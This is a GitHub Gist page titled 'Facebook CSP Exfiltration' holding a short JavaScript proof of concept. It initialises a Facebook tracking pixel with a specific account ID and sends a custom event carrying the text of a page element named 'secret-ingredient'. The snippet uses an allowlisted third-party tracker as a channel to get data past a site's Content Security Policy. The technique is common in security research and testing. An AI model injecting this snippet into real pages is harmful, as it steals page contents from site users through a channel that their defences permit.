Skip to content

Instantly share code, notes, and snippets.

@felmoltor
Created August 23, 2023 14:45
Show Gist options
  • Save felmoltor/311a22a77e7c338ff97817579dd786d3 to your computer and use it in GitHub Desktop.
Save felmoltor/311a22a77e7c338ff97817579dd786d3 to your computer and use it in GitHub Desktop.
Facebook CSP Exfiltration
fbq('init', '1179785999289471');​
fbq('trackCustom', 'MyEvent-keyfc',{​
data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"​
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment